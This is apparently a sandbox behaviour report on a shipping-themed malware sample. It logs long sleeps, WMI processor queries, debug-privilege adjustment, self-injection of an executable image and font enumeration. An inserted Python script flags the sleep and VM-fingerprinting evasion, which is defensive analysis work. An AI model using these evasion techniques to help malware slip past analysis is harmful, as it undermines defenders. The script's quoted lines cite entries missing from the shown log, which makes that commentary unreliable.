        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198495
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198340
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198199
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197594
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197453
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197296
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197146
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1197017
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196889
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196770
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196650
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196530
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196426
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196299
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1196018
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195896
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195760
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195640
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195535
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195348
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195192
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1195005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194848
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194692
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194557
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194442
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194302
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194182
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1194066
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193928
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193798
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193634
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193517
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193401
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193286
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193145
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1193005
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Window / User API: threadDelayed 9470
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 40023
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Memory allocated: page read and write | page guard
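The three evasion verdicts in this section (a timed sleep at or above 30000, a sleep loop of more than 30 calls, and WMI classes used for VM fingerprinting) can be re-derived from the raw behaviour lines. The figures carry an "s" suffix but are milliseconds (1200000 is the 20-minute delay behind "Contains long sleeps (>= 3 min)"), and the minus sign is the relative-interval convention of NtDelayExecution. The Python below is an added example written for this page, not Joe Sandbox code: the thresholds are taken from the comparisons the report prints, the sample lines are copied from this section, and two points are my own interpretation, namely that 922337203685477 (|INT64_MIN| in 100 ns ticks, in milliseconds) marks an unbounded Sleep(INFINITE) rather than a timed one, and that Win32_Processor belongs in the fingerprinting set even though the report lists those queries without flagging them.

```python
"""Re-derive the evasion verdicts of a Joe Sandbox behaviour section from its raw lines."""
import re
from dataclasses import dataclass, field

# Thresholds exactly as the report states them in its comparisons:
# "Thread sleep time: -40023s >= -30000s" and "Thread sleep count: 9470 > 30".
# The figures are milliseconds despite the "s" suffix (1200000 = 20 min); the
# minus sign is NtDelayExecution's relative-interval convention.
LONG_SLEEP_MS = 30_000
SLEEP_COUNT_LIMIT = 30
# |INT64_MIN| 100-ns ticks expressed in ms, i.e. what Sleep(INFINITE) reaches the
# kernel as (my interpretation); anything at or above it is an unbounded wait.
INFINITE_MS = 922_337_203_685_477

# WMI classes the report's signatures tie to VM fingerprinting. Win32_Processor is
# included on my own judgement (it exposes hypervisor CPU names and core counts);
# the report lists those queries without flagging them.
VM_FINGERPRINT_CLASSES = {
    "Win32_Bios", "Win32_BaseBoard", "Win32_NetworkAdapter",
    "Win32_NetworkAdapterConfiguration", "Win32_Processor",
}

# \s* rather than a literal space: extracted reports often glue "6104Thread".
SLEEP_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep time:\s*-?(\d+)s")
COUNT_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep count:\s*(\d+)")
WMI_RE = re.compile(r"root\\cimv2\s*:\s*(?:SELECT\s.*?\sFROM\s+)?(Win32_\w+)")


@dataclass
class EvasionFindings:
    long_sleeps: dict = field(default_factory=dict)    # tid -> longest timed sleep, ms
    infinite_sleeps: set = field(default_factory=set)  # tids that issued an unbounded wait
    sleep_loops: dict = field(default_factory=dict)    # tid -> sleep call count
    wmi_classes: set = field(default_factory=set)      # fingerprint classes queried

    def verdicts(self) -> list:
        """Signature-style summary lines in the wording the report uses."""
        out = []
        if self.long_sleeps or self.infinite_sleeps:
            out.append("Contains long sleeps (>= %d ms)" % LONG_SLEEP_MS)
        if self.sleep_loops:
            out.append("May sleep (evasive loops) to hinder dynamic analysis")
        if self.wmi_classes:
            out.append("Queries VM-fingerprinting WMI classes: "
                       + ", ".join(sorted(self.wmi_classes)))
        return out


def analyze(lines) -> EvasionFindings:
    """Apply the three evasion checks to an iterable of report lines."""
    f = EvasionFindings()
    for line in lines:
        m = SLEEP_RE.search(line)
        if m:
            tid, ms = m.group(1), int(m.group(2))
            if ms >= INFINITE_MS:
                f.infinite_sleeps.add(tid)
            elif ms >= LONG_SLEEP_MS:
                f.long_sleeps[tid] = max(f.long_sleeps.get(tid, 0), ms)
            continue
        m = COUNT_RE.search(line)
        if m:
            if int(m.group(2)) > SLEEP_COUNT_LIMIT:
                f.sleep_loops[m.group(1)] = int(m.group(2))
            continue
        m = WMI_RE.search(line)
        if m and m.group(1) in VM_FINGERPRINT_CLASSES:
            f.wmi_classes.add(m.group(1))
    return f


# A handful of lines copied from the report section above (one left glued as extracted).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5296 Thread sleep time: -40023s >= -30000s",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5852 Thread sleep count: 9470 > 30",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104Thread sleep time: -1200000s >= -30000s",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199750s >= -30000s",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Process token adjusted: Debug",
]

if __name__ == "__main__":
    for verdict in analyze(REPORT_LINES).verdicts():
        print(verdict)
```

Run against the lines above it reports thread 5588 as an unbounded wait, threads 5296 and 6104 as timed long sleeps (40023 ms and 1200000 ms), thread 5852 as the 9470-call sleep loop, and Win32_BaseBoard plus Win32_Processor as fingerprinting queries; the "Process token adjusted" line matches nothing, which is the intended negative case.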

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Memory written: C:\Users\user\Desktop\FeDex_shipping_document.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
